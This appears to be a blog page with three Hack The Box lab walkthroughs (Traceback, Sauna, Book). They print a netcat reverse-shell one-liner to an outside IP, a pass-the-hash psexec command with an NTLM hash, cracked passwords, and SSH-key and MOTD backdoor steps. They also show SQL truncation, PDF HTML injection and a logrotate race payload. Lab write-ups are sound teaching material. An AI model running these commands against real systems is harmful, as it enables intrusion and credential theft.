Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP


The main web page shows a simple web page:

Looking in the Github repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine we can see there is one running:


Initial FootHold

Using admin:admin we can get access to a panel where we can upload files, list contents of directories etc...



Our first objective is to upload a php reverse shell (there are many on the internet) and get a shell:




We're in as user webadmin.
Next step is to enumerate other users

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

LUA is a scripting language.
It seems also that user webadmin can run luvit (lua interpreter) as user sysdamin via sudo  (no Password)

The obvious step here is to create a script like /tmp/nik.lua


1
os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as

1
sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua


And get a shell as sysadmin

Root Flag

As sysadmin thhe next step is enumeration with tools like LinEnum or similar.
But it seems that there is nothing interesting
Looking with pspy to see running processes we can see that there is a recurrent task:

There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every 1 minute.
Interesting... looks something that cleans corrupted files..

Infact user sysdamin can modify all files in /etc/

The interesting thing is that sshd will run this file as root to show the MOTD and additional messages to all ssh session created.

So we can modify one the files above to run command as root and gain access, but we have to be fast because in one minute the file will be cleaned up.
The sequence of operation to do is:

  • Add our public ssh key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also upload our key for further use)

  • Run  the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header adding our code to be executed at next ssh session

  • Logon as sysadmin by ssh (we should be able to do this as we added the key). This operation should result in execution of  cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys

  • Logon as root (the previous command should have added our key to root authorized keys) 


By - No comments:
Labels:

Hack The Box - Sauna Writeup

Machine summary


Enumeration phase

Since it's a windows box I first run enum4linux with no arguments and the only information I got was the domain name: EGOTISTICALBANK

Scanning with nmap for open ports:

We can see that LDAP port is open, which means that is should be a domain controller.
BUt there is also port 80 open so it's worth taking a look at the web page:
NOthing useful here, maybe a couple of from in "Apply now" and "contact Us"
Maybe the team page can help:

Initial Foothold and User escalation 


I compiled a few combination of users like

  • s.driver
  • sdriver
  • sophie.driver
  • h.bear
  • ...
Then I used kerbrute tool to enumerate user using the created user list 



It looks like user fsmith exists

Now I used impacket GetNPUser to get information of user fsmith, if he doesn't have Kerberos preauth:

Saving the hash in a file like hash.txt and running hashcat:
 hashcat  -m 18200 --force hash.txt  rockyou.txt
It will find that password is Thestrokes23 in a few seconds:


So now we have a valid user and password confirmed by smbclient:

With this account we can run evil-winrm or any other winrm script and get access to the system a fsmith:

User fsmith also has the user flag on its desktop: 1b5520b98d97cf17f24122a55baf70cf

The next step is to enumerate users, groups and privileges on the AD

Further enumeration

Maybe some of the steps below are not needed but I wanted to get a good knowledge of the system before acting...

Now we can see that there is also a service user svc_loanmgr

I can upload Sharpound.ps1 and run it:

And the copy the result locally to analyze with Bloodhound


Below some maps by Bloodhound:



With rpcclient we can see that there are some users:

There are only standard groups:

Anbd the three non standard users (fsmith, hsmith, svc_loanmgr) are part of "domain users" groups

We can get the SIDs of these users:

Uploading Winpeas.exe we can get some possible points of escalation:
- No AV installed
- appcmd.exe is installed
- User can create folder in c:\
- LAPS not installed
- Credentialguard not enabled
- LSA Protection not enabled

Using the reg query comamnd to get default username and password settings:

We can connect

  • username: svc_loanmanager
  • password: Moneymakestheworldgoround!

He has some more privileges than a standard user:

Root escalation

With the user svc_loanmgr we can dump secrets with impacket:

once we have the NTLM hash of administrator it's easy to run psexec from impacket using 

python3 ../../impacket-master/examples/psexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff "EGOTISTICALBANK/administrator@10.10.10.175"

and we can get a shell as administrator:

Root flag is: f3ee04965c68257382e31502cc5e881f

By - No comments:
Labels:

Hack The Box - Book Writeup

System Summary



Initial Enumeration


It's a Linux box so the first step is nmap but this only shows port 22 and port 80.

The web site looks a gallery/library site.

Here's the login page:
We can create an account and login: we are presented some pages, one of them contains a gallery with some some pdfs ans images. One page can be used to upload files, but they are not shown in the gallery after upload. I might be idiot, but I can't find any way to get something on the box (LFI, RFI, SQL injection, upload of files, ...)

With a scanner like dirb or dirbuster I can find an administration URL: http://10.10.10.176/admin


The interesting part here is the registration form n the main page:

There is a check that the name and email fields must be shorter than 10 and 20 characthers respectively.

After some tentatives with varius tecniques like SQL injection, I came across the "SQL Truncation" vulnerability, which I've never encountered before.

If we try to register an existing account (like admin@book.htb 😃) we get the error "User Exists!", which is good.

But we can fool this registration form and we can change the password of the existing user.
The idea is to add spaces to name and email filed to reach the length limit plus one character.
Example:

  • name: admin     1 (note the 5 spaces to reach a total lenght of 11)
  • email: admin@book.htb      1 (note the 6 spaces to reach a lenght of 21)

This will foll the SQL select clause to check existance of admin@book.htb due to spaces and characters.

But the following SQL insert clause will ignore the last character and then will strip out the trailing spaces, effectively overwriting the data of admin@book.htb record.

Unfortunately the web form is not usable because it doesn't accept spaces in the email field: we have to use Burp Repeater.
We can simulate a registration and then send the POST to Burp Repeater module and add the spaces in the email field (line 14 of the image below)


With this we can reset the admin@book.htb password to test123
And we can login to the admin section:




Initial Foothold and User flag

Now that we have two way of access we can use

  • standard user to upload malicious things in the coll
  • admin user (admin@book.htb) to download a PDF containing 

Standard User can upload files here:

Admin user can download a PDF of all the collections (the already populated plus the ones generated by user uploads) here:

The second PDF link will generate the PDF below (the fith element was generated by user upload):



Might wonder if we can upload some php file with reverse shell or other things to pop a shell
I tried many things for hours with no luck.

Finally I got he solution which is not related to the file but to the title or Author field.
It is interpreted as HTML, so we can inject a script.
The solution is to paste a code like this in the book title or author:


It will be interpreted and will get the content of the file /etc/passwd. Then the web application will generate a PDF using this input.
We can collect the PDF in the admin portal and see:



So now it's time to disclose other files, going directly to /home/reader/.ssh/id_rsa with this script

And this PDF output:


This key can be converted to text with pdftotext and then used for accessing the box:




Root Flag

Upon enumerating we can discover some weird processes that runs periodically (around 4 minutes)

  •  a custom logrotate service that rotates files in  /home/reader/backup/access.log 
  • an automated ssh session to localhost as root that last a few seconds
  • a reset script that cleans up /home/reader/backup/

I believe that box creator wanted the users to exploit the race condition in logrotate as explained in  https://github.com/whotwagner/logrotten

There is a race condition in logrotate that gives a way to write files in privileged folder
We just have to create a script in bash (payload) and run the exploit present in the github repo

The exploit  is configured to take the payload file and move it to /etc/bash_completion.d/

So the payload will run as a script as soon as a user logs in
Now let's create a script that copies the root flag (it could a reverse shell or other commands). Be sure to make it run only if current user is root (the sense of `id -u` -eq 0)

if [ `id -u` -eq 0 ]; then (/bin/cat /root/root.txt >> /tmp/flag &); fi

Then run the exploit code and wait...
After a few minutes, the exploit stops because the race condition was triggered and e can see that our payload is now in /etc/bash_completion.d/ as access.log (or similar name)


After the automated ssh session by root the flag is copied in the desired location :


Please be aware that this is a race condition and it can be difficult to trigger if many users are trying to exploit it at the same time


By - No comments:
Labels:
Subscribe to: Posts (Atom)